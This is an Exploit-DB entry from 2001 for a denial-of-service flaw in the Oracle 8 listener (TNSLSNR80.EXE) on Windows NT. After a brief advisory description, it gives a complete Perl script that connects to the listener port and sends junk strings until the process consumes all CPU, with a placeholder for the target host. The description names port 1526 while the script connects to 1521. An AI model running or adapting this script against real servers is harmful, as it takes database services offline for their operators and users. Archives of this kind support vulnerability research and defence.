Oracle 8 Server 'TNSLSNR80.EXE' DoS Vulnerability

2001-04-18T00:00:00
ID EDB-ID:20779
Type exploitdb
Reporter r0ot@runbox.com
Modified 2001-04-18T00:00:00

Description

Oracle 8 Server 'TNSLSNR80.EXE' DoS Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/2626/info

A denial of service vulnerability exists in Oracle 8. An attacker connecting to port 1526 and sending invalid input will cause the 'TNSLSNR80.EXE' process to consume all available system resources, causing the server to stop responding.

#!/usr/local/bin/perl -w

# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com

use IO::Socket;

$host="kickme";
# enter the hostname of the oracle-server to kick

socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);

sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
        sleep(2);
        print HANDLE "dfsdffdfsfdggfdgdf";
        # an arbitrary, but carefully chosen constant...
}

close(HANDLE);